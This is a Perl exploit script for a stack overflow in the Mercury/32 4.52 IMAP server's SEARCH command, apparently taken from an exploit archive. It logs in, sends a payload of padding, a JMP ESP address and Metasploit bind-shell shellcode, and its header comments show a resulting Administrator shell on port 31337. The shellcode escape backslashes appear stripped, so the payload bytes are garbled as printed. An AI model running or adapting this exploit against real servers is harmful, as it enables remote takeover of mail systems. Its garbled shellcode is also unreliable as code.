Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit

                                                # Z:Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org
#    Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
#                                          Found & Code by void# ph4nt0m.org
# 
# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.
# C: pst06 LOGIN void ph4nt0m.org
# S: pst06 OK LOGIN completed.
# C: pst06 SELECT INBOX
# S: * 0 EXISTS
# S: * 0 RECENT
# S: * FLAGS (Deleted Draft Seen Answered)
# S: * OK [UIDVALIDITY 1190225819] UID Validity
# S: * OK [UIDNEXT 1] Predicted next UID
# S: * OK [PERMANENTFLAGS (Deleted Draft Seen Answered)] Settable message flag
# s
# S: pst06 OK [READ-WRITE] SELECT completed.
# [*] Send Evil Payload ...
# [+] Done! Check out [email protected]:31337. Good Luck  :-P 
# 
# Z:Exp>nc -vv 127.0.0.1 31337
# DNS fwd/rev mismatch: localhost != GNU
# localhost [127.0.0.1] 31337 (?) open
# Microsoft Windows XP [掳忙卤戮 5.1.2600]
# (C) 掳忙脠篓脣霉脫脨 1985-2001 Microsoft Corp.
# 
# e:MERCURY>whoami
# whoami
# Administrator
# 
# e:MERCURY>

use strict;
use warnings;
use IO::Socket;

# Target IP
my $imap_host = shift || 127.0.0.1;
my $imap_port = shift || 143;
my $imap_user = shift || "void";
my $imap_pass = shift || "ph4nt0m.org";

my $banner = 
"   Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
".
"                                         Found & Code by void#ph4nt0m.org
".
"
";

my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org";
my $jmpesp = "x12x45xfax7f"; # Windows 2000/xp/2003 CHS Universe

# /* win32_bind -  EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */
# bad char: 0x00 0x0A 0x0D 0x20 0x29 
my $shellcode =
"x31xc9x81xe9xb0xffxffxffxe8xffxffxffxffxc0x5ex81".
"x76x0exfaxd1xa5x6fx83xeexfcxe2xf4x06xbbx4ex22x12".
"x28x5ax90x05xb1x2ex03xdexf5x2ex2axc6x5axd9x6ax82".
"xd0x4axe4xb5xc9x2ex30xdaxd0x4ex26x71xe5x2ex6ex14".
"xe0x65xf6x56x55x65x1bxfdx10x6fx62xfbx13x4ex9bxc1".
"x85x81x47x8fx34x2ex30xdexd0x4ex09x71xddxeexe4xa5".
"xcdxa4x84xf9xfdx2exe6x96xf5xb9x0ex39xe0x7ex0bx71".
"x92x95xe4xbaxddx2ex1fxe6x7cx2ex2fxf2x8fxcdxe1xb4".
"xdfx49x3fx05x07xc3x3cx9cxb9x96x5dx92xa6xd6x5dxa5".
"x85x5axbfx92x1ax48x93xc1x81x5axb9xa5x58x40x09x7b".
"x3cxadx6dxafxbbxa7x90x2axb9x7cx66x0fx7cxf2x90x2c".
"x82xf6x3cxa9x82xe6x3cxb9x82x5axbfx9cxb9xdfx06x9c".
"x82x2cx8ex6fxb9x01x75x8ax16xf2x90x2cxbbxb5x3exaf".
"x2ex75x07x5ex7cx8bx86xadx2ex73x3cxafx2ex75x07x1f".
"x98x23x26xadx2ex73x3fxaex85xf0x90x2ax42xcdx88x83".
"x17xdcx38x05x07xf0x90x2axb7xcfx0bx9cxb9xc6x02x73".
"x34xcfx3fxa3xf8x69xe6x1dxbbxe1xe6x18xe0x65x9cx50".
"x2fxe7x42x04x93x89xfcx77xabx9dxc4x51x7axcdx1dx04".
"x62xb3x90x8fx95x5axb9xa1x86xf7x3exabx80xcfx6exab".
"x80xf0x3ex05x01xcdxc2x23xd4x6bx3cx05x07xcfx90x05".
"xe6x5axbfx71x86x59xecx3exb5x5axb9xa8x2ex75x07x15".
"x1fx45x0fxa9x2ex73x90x2axd1xa5x6f";



print $banner;
sleep(1);

my $sock = IO::Socket::INET->new( PeerHost=>$imap_host, PeerPort=>$imap_port, proto=>"tcp" ) or die "Connect error.
";
imap_recv("");

imap_send("pst06 LOGIN $imap_user $imap_pass
", "rv");
imap_send("pst06 SELECT INBOX
", "rv");

my $payload = $cheers.$jmpesp.$shellcode;
print "[*] Send Evil Payload ...
";
imap_send("pst06 SEARCH ON $payload
", "");
sleep(1);
print "[+] Done! Check out cmdshell@$imap_host:31337. Good Luck :-P
";
$sock->close();


sub imap_send
{
	if($_[1] =~ /v/)
	{
		if(length($_[0])<=75)
		{
			print "C: ".$_[0];
		}
		else
		{
			print "C: ".substr($_[0], 0, 36)." ... ".substr($_[0], -36, -1)."
";
		}
	}

	print $sock $_[0];

	if($_[1] =~ /r/)
	{	
		imap_recv(substr($_[0], 0, index($_[0], " ")+1));
	}
}


sub imap_recv
{
	while(<$sock>)
	{
		print "S: ".$_;
		if($_ =~ /$_[0]OK/)
		{	last;	}
		elsif($_ =~ /$_[0]NO|$_[0]BAD/ )
		{	last;	}
		else
		{	next;	}
	}
}

# sebug.net